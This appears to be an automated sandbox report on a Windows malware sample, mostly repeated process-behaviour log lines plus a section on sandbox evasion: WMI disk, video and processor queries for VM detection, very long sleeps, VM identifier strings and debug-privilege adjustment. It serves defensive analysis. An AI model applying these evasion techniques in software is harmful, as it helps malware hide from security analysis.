                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4FC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1968Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1775Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4012Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 846Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1006Jump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2345
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 4012 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 5813 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep time: -17524406870024063s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4928Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5312Thread sleep count: 846 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5312Thread sleep count: 1006 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8064Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7D6FD204C
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD64E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF7D6FD64E4
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: powershell.exe, 00000006.00000002.2009787604.0000011699F8B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QEMU Virtual CPU
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: RegAsm.exe, 0000000A.00000002.2113803747.0000000005930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                  Source: wscript.exe, 00000003.00000003.1752918437.000001FD20754000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF7D6FD1D28
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7D6FD8494
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD8790 SetUnhandledExceptionFilter,0_2_00007FF7D6FD8790
